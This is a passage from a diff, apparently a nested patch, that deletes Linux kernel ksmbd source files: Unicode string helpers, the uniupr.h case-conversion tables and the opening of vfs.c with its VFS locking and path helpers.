+-	int i = 0;
+-
+-	while (*ucs1++)
+-		i++;
+-	return i;
+-}
+-
+-/*
+- * UniStrnlen:  Return the length (in 16 bit Unicode chars not bytes) of a
+- *		string (length limited)
+- */
+-static inline size_t UniStrnlen(const wchar_t *ucs1, int maxlen)
+-{
+-	int i = 0;
+-
+-	while (*ucs1++) {
+-		i++;
+-		if (i >= maxlen)
+-			break;
+-	}
+-	return i;
+-}
+-
+-/*
+- * UniStrncat:  Concatenate length limited string
+- */
+-static inline wchar_t *UniStrncat(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;	/* save pointer to string 1 */
+-
+-	while (*ucs1++)
+-	/*NULL*/;
+-	ucs1--;			/* point to null terminator of s1 */
+-	while (n-- && (*ucs1 = *ucs2)) {	/* copy s2 after s1 */
+-		ucs1++;
+-		ucs2++;
+-	}
+-	*ucs1 = 0;		/* Null terminate the result */
+-	return anchor;
+-}
+-
+-/*
+- * UniStrncmp:  Compare length limited string
+- */
+-static inline int UniStrncmp(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	if (!n)
+-		return 0;	/* Null strings are equal */
+-	while ((*ucs1 == *ucs2) && *ucs1 && --n) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int)*ucs1 - (int)*ucs2;
+-}
+-
+-/*
+- * UniStrncmp_le:  Compare length limited string - native to little-endian
+- */
+-static inline int
+-UniStrncmp_le(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	if (!n)
+-		return 0;	/* Null strings are equal */
+-	while ((*ucs1 == __le16_to_cpu(*ucs2)) && *ucs1 && --n) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int)*ucs1 - (int)__le16_to_cpu(*ucs2);
+-}
+-
+-/*
+- * UniStrncpy:  Copy length limited string with pad
+- */
+-static inline wchar_t *UniStrncpy(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;
+-
+-	while (n-- && *ucs2)	/* Copy the strings */
+-		*ucs1++ = *ucs2++;
+-
+-	n++;
+-	while (n--)		/* Pad with nulls */
+-		*ucs1++ = 0;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrncpy_le:  Copy length limited string with pad to little-endian
+- */
+-static inline wchar_t *UniStrncpy_le(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;
+-
+-	while (n-- && *ucs2)	/* Copy the strings */
+-		*ucs1++ = __le16_to_cpu(*ucs2++);
+-
+-	n++;
+-	while (n--)		/* Pad with nulls */
+-		*ucs1++ = 0;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrstr:  Find a string in a string
+- *
+- * Returns:
+- *     Address of first match found
+- *     NULL if no matching string is found
+- */
+-static inline wchar_t *UniStrstr(const wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	const wchar_t *anchor1 = ucs1;
+-	const wchar_t *anchor2 = ucs2;
+-
+-	while (*ucs1) {
+-		if (*ucs1 == *ucs2) {
+-			/* Partial match found */
+-			ucs1++;
+-			ucs2++;
+-		} else {
+-			if (!*ucs2)	/* Match found */
+-				return (wchar_t *)anchor1;
+-			ucs1 = ++anchor1;	/* No match */
+-			ucs2 = anchor2;
+-		}
+-	}
+-
+-	if (!*ucs2)		/* Both end together */
+-		return (wchar_t *)anchor1;	/* Match found */
+-	return NULL;		/* No match */
+-}
+-
+-#ifndef UNIUPR_NOUPPER
+-/*
+- * UniToupper:  Convert a unicode character to upper case
+- */
+-static inline wchar_t UniToupper(register wchar_t uc)
+-{
+-	register const struct UniCaseRange *rp;
+-
+-	if (uc < sizeof(SmbUniUpperTable)) {
+-		/* Latin characters */
+-		return uc + SmbUniUpperTable[uc];	/* Use base tables */
+-	}
+-
+-	rp = SmbUniUpperRange;	/* Use range tables */
+-	while (rp->start) {
+-		if (uc < rp->start)	/* Before start of range */
+-			return uc;	/* Uppercase = input */
+-		if (uc <= rp->end)	/* In range */
+-			return uc + rp->table[uc - rp->start];
+-		rp++;	/* Try next range */
+-	}
+-	return uc;		/* Past last range */
+-}
+-
+-/*
+- * UniStrupr:  Upper case a unicode string
+- */
+-static inline __le16 *UniStrupr(register __le16 *upin)
+-{
+-	register __le16 *up;
+-
+-	up = upin;
+-	while (*up) {		/* For all characters */
+-		*up = cpu_to_le16(UniToupper(le16_to_cpu(*up)));
+-		up++;
+-	}
+-	return upin;		/* Return input pointer */
+-}
+-#endif				/* UNIUPR_NOUPPER */
+-
+-#ifndef UNIUPR_NOLOWER
+-/*
+- * UniTolower:  Convert a unicode character to lower case
+- */
+-static inline wchar_t UniTolower(register wchar_t uc)
+-{
+-	register const struct UniCaseRange *rp;
+-
+-	if (uc < sizeof(CifsUniLowerTable)) {
+-		/* Latin characters */
+-		return uc + CifsUniLowerTable[uc];	/* Use base tables */
+-	}
+-
+-	rp = CifsUniLowerRange;	/* Use range tables */
+-	while (rp->start) {
+-		if (uc < rp->start)	/* Before start of range */
+-			return uc;	/* Uppercase = input */
+-		if (uc <= rp->end)	/* In range */
+-			return uc + rp->table[uc - rp->start];
+-		rp++;	/* Try next range */
+-	}
+-	return uc;		/* Past last range */
+-}
+-
+-/*
+- * UniStrlwr:  Lower case a unicode string
+- */
+-static inline wchar_t *UniStrlwr(register wchar_t *upin)
+-{
+-	register wchar_t *up;
+-
+-	up = upin;
+-	while (*up) {		/* For all characters */
+-		*up = UniTolower(*up);
+-		up++;
+-	}
+-	return upin;		/* Return input pointer */
+-}
+-
+-#endif
+-
+-#endif /* _CIFS_UNICODE_H */
+diff --git a/fs/ksmbd/uniupr.h b/fs/ksmbd/uniupr.h
+deleted file mode 100644
+index 26583b776897b..0000000000000
+--- a/fs/ksmbd/uniupr.h
++++ /dev/null
+@@ -1,268 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Some of the source code in this file came from fs/cifs/uniupr.h
+- *   Copyright (c) International Business Machines  Corp., 2000,2002
+- *
+- * uniupr.h - Unicode compressed case ranges
+- *
+- */
+-#ifndef __KSMBD_UNIUPR_H
+-#define __KSMBD_UNIUPR_H
+-
+-#ifndef UNIUPR_NOUPPER
+-/*
+- * Latin upper case
+- */
+-signed char SmbUniUpperTable[512] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 040-04f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 050-05f */
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-				-32, -32, -32, -32, -32,	/* 060-06f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-				-32, 0, 0, 0, 0, 0,	/* 070-07f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0c0-0cf */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0d0-0df */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-			 -32, -32, -32, -32, -32, -32,	/* 0e0-0ef */
+-	-32, -32, -32, -32, -32, -32, -32, 0, -32, -32,
+-			 -32, -32, -32, -32, -32, 121,	/* 0f0-0ff */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 100-10f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 110-11f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 120-12f */
+-	0, 0, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 130-13f */
+-	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1,	/* 140-14f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 150-15f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 160-16f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 170-17f */
+-	0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0, 0,	/* 180-18f */
+-	0, 0, -1, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0,	/* 190-19f */
+-	0, -1, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, 0, -1, 0, 0,	/* 1a0-1af */
+-	-1, 0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0,	/* 1b0-1bf */
+-	0, 0, 0, 0, 0, -1, -2, 0, -1, -2, 0, -1, -2, 0, -1, 0,	/* 1c0-1cf */
+-	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, -79, 0, -1, /* 1d0-1df */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e0-1ef */
+-	0, 0, -1, -2, 0, -1, 0, 0, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1f0-1ff */
+-};
+-
+-/* Upper case range - Greek */
+-static signed char UniCaseRangeU03a0[47] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -38, -37, -37, -37,	/* 3a0-3af */
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-					 -32, -32, -32, -32,	/* 3b0-3bf */
+-	-32, -32, -31, -32, -32, -32, -32, -32, -32, -32, -32, -32, -64,
+-	-63, -63,
+-};
+-
+-/* Upper case range - Cyrillic */
+-static signed char UniCaseRangeU0430[48] = {
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-					 -32, -32, -32, -32,	/* 430-43f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-					 -32, -32, -32, -32,	/* 440-44f */
+-	0, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80,
+-					 -80, -80, 0, -80, -80,	/* 450-45f */
+-};
+-
+-/* Upper case range - Extended cyrillic */
+-static signed char UniCaseRangeU0490[61] = {
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 490-49f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4a0-4af */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4b0-4bf */
+-	0, 0, -1, 0, -1, 0, 0, 0, -1, 0, 0, 0, -1,
+-};
+-
+-/* Upper case range - Extended latin and greek */
+-static signed char UniCaseRangeU1e00[509] = {
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e00-1e0f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e10-1e1f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e20-1e2f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e30-1e3f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e40-1e4f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e50-1e5f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e60-1e6f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e70-1e7f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e80-1e8f */
+-	0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, -59, 0, -1, 0, -1,	/* 1e90-1e9f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ea0-1eaf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1eb0-1ebf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ec0-1ecf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ed0-1edf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ee0-1eef */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f00-1f0f */
+-	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f10-1f1f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f20-1f2f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f30-1f3f */
+-	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f40-1f4f */
+-	0, 8, 0, 8, 0, 8, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f50-1f5f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f60-1f6f */
+-	74, 74, 86, 86, 86, 86, 100, 100, 0, 0, 112, 112,
+-				 126, 126, 0, 0,	/* 1f70-1f7f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f80-1f8f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f90-1f9f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fa0-1faf */
+-	8, 8, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fb0-1fbf */
+-	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fc0-1fcf */
+-	8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fd0-1fdf */
+-	8, 8, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fe0-1fef */
+-	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+-};
+-
+-/* Upper case range - Wide latin */
+-static signed char UniCaseRangeUff40[27] = {
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-			 -32, -32, -32, -32, -32,	/* ff40-ff4f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-};
+-
+-/*
+- * Upper Case Range
+- */
+-const struct UniCaseRange SmbUniUpperRange[] = {
+-	{0x03a0, 0x03ce, UniCaseRangeU03a0},
+-	{0x0430, 0x045f, UniCaseRangeU0430},
+-	{0x0490, 0x04cc, UniCaseRangeU0490},
+-	{0x1e00, 0x1ffc, UniCaseRangeU1e00},
+-	{0xff40, 0xff5a, UniCaseRangeUff40},
+-	{0}
+-};
+-#endif
+-
+-#ifndef UNIUPR_NOLOWER
+-/*
+- * Latin lower case
+- */
+-signed char CifsUniLowerTable[512] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-					 32, 32, 32,	/* 040-04f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 0, 0,
+-					 0, 0, 0,	/* 050-05f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 060-06f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 070-07f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-				 32, 32, 32, 32,	/* 0c0-0cf */
+-	32, 32, 32, 32, 32, 32, 32, 0, 32, 32, 32, 32,
+-					 32, 32, 32, 0,	/* 0d0-0df */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0e0-0ef */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0f0-0ff */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 100-10f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 110-11f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 120-12f */
+-	0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1,	/* 130-13f */
+-	0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0,	/* 140-14f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 150-15f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 160-16f */
+-	1, 0, 1, 0, 1, 0, 1, 0, -121, 1, 0, 1, 0, 1, 0,
+-						 0,	/* 170-17f */
+-	0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 79,
+-						 0,	/* 180-18f */
+-	0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 190-19f */
+-	1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1,	/* 1a0-1af */
+-	0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,	/* 1b0-1bf */
+-	0, 0, 0, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1, 0, 1,	/* 1c0-1cf */
+-	0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0,	/* 1d0-1df */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e0-1ef */
+-	0, 2, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1f0-1ff */
+-};
+-
+-/* Lower case range - Greek */
+-static signed char UniCaseRangeL0380[44] = {
+-	0, 0, 0, 0, 0, 0, 38, 0, 37, 37, 37, 0, 64, 0, 63, 63,	/* 380-38f */
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-						 32, 32, 32,	/* 390-39f */
+-	32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-};
+-
+-/* Lower case range - Cyrillic */
+-static signed char UniCaseRangeL0400[48] = {
+-	0, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80,
+-					 0, 80, 80,	/* 400-40f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-					 32, 32, 32,	/* 410-41f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-					 32, 32, 32,	/* 420-42f */
+-};
+-
+-/* Lower case range - Extended cyrillic */
+-static signed char UniCaseRangeL0490[60] = {
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 490-49f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4a0-4af */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4b0-4bf */
+-	0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
+-};
+-
+-/* Lower case range - Extended latin and greek */
+-static signed char UniCaseRangeL1e00[504] = {
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e00-1e0f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e10-1e1f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e20-1e2f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e30-1e3f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e40-1e4f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e50-1e5f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e60-1e6f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e70-1e7f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e80-1e8f */
+-	1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,	/* 1e90-1e9f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ea0-1eaf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1eb0-1ebf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ec0-1ecf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ed0-1edf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ee0-1eef */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f00-1f0f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f10-1f1f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f20-1f2f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f30-1f3f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f40-1f4f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, -8, 0, -8, 0, -8, 0, -8,	/* 1f50-1f5f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f60-1f6f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f70-1f7f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f80-1f8f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f90-1f9f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1fa0-1faf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -74, -74, -9, 0, 0, 0,	/* 1fb0-1fbf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -86, -86, -86, -86, -9, 0,
+-							 0, 0,	/* 1fc0-1fcf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -100, -100, 0, 0, 0, 0,	/* 1fd0-1fdf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -112, -112, -7, 0,
+-							 0, 0,	/* 1fe0-1fef */
+-	0, 0, 0, 0, 0, 0, 0, 0,
+-};
+-
+-/* Lower case range - Wide latin */
+-static signed char UniCaseRangeLff20[27] = {
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-							 32,	/* ff20-ff2f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-};
+-
+-/*
+- * Lower Case Range
+- */
+-const struct UniCaseRange CifsUniLowerRange[] = {
+-	{0x0380, 0x03ab, UniCaseRangeL0380},
+-	{0x0400, 0x042f, UniCaseRangeL0400},
+-	{0x0490, 0x04cb, UniCaseRangeL0490},
+-	{0x1e00, 0x1ff7, UniCaseRangeL1e00},
+-	{0xff20, 0xff3a, UniCaseRangeLff20},
+-	{0}
+-};
+-#endif
+-
+-#endif /* __KSMBD_UNIUPR_H */
+diff --git a/fs/ksmbd/vfs.c b/fs/ksmbd/vfs.c
+deleted file mode 100644
+index 94b8ed4ef8707..0000000000000
+--- a/fs/ksmbd/vfs.c
++++ /dev/null
+@@ -1,1911 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/kernel.h>
+-#include <linux/fs.h>
+-#include <linux/uaccess.h>
+-#include <linux/backing-dev.h>
+-#include <linux/writeback.h>
+-#include <linux/xattr.h>
+-#include <linux/falloc.h>
+-#include <linux/fsnotify.h>
+-#include <linux/dcache.h>
+-#include <linux/slab.h>
+-#include <linux/vmalloc.h>
+-#include <linux/sched/xacct.h>
+-#include <linux/crc32c.h>
+-
+-#include "../internal.h"	/* for vfs_path_lookup */
+-
+-#include "glob.h"
+-#include "oplock.h"
+-#include "connection.h"
+-#include "vfs.h"
+-#include "vfs_cache.h"
+-#include "smbacl.h"
+-#include "ndr.h"
+-#include "auth.h"
+-#include "misc.h"
+-
+-#include "smb_common.h"
+-#include "mgmt/share_config.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/user_config.h"
+-
+-static char *extract_last_component(char *path)
+-{
+-	char *p = strrchr(path, '/');
+-
+-	if (p && p[1] != '\0') {
+-		*p = '\0';
+-		p++;
+-	} else {
+-		p = NULL;
+-	}
+-	return p;
+-}
+-
+-static void ksmbd_vfs_inherit_owner(struct ksmbd_work *work,
+-				    struct inode *parent_inode,
+-				    struct inode *inode)
+-{
+-	if (!test_share_config_flag(work->tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_INHERIT_OWNER))
+-		return;
+-
+-	i_uid_write(inode, i_uid_read(parent_inode));
+-}
+-
+-/**
+- * ksmbd_vfs_lock_parent() - lock parent dentry if it is stable
+- *
+- * the parent dentry got by dget_parent or @parent could be
+- * unstable, we try to lock a parent inode and lookup the
+- * child dentry again.
+- *
+- * the reference count of @parent isn't incremented.
+- */
+-int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
+-			  struct dentry *child)
+-{
+-	struct dentry *dentry;
+-	int ret = 0;
+-
+-	inode_lock_nested(d_inode(parent), I_MUTEX_PARENT);
+-	dentry = lookup_one(user_ns, child->d_name.name, parent,
+-			    child->d_name.len);
+-	if (IS_ERR(dentry)) {
+-		ret = PTR_ERR(dentry);
+-		goto out_err;
+-	}
+-
+-	if (dentry != child) {
+-		ret = -ESTALE;
+-		dput(dentry);
+-		goto out_err;
+-	}
+-
+-	dput(dentry);
+-	return 0;
+-out_err:
+-	inode_unlock(d_inode(parent));
+-	return ret;
+-}
+-
